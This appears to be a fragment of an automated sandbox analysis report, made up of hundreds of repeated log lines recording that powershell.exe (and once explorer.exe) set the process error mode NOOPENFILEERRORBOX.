                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
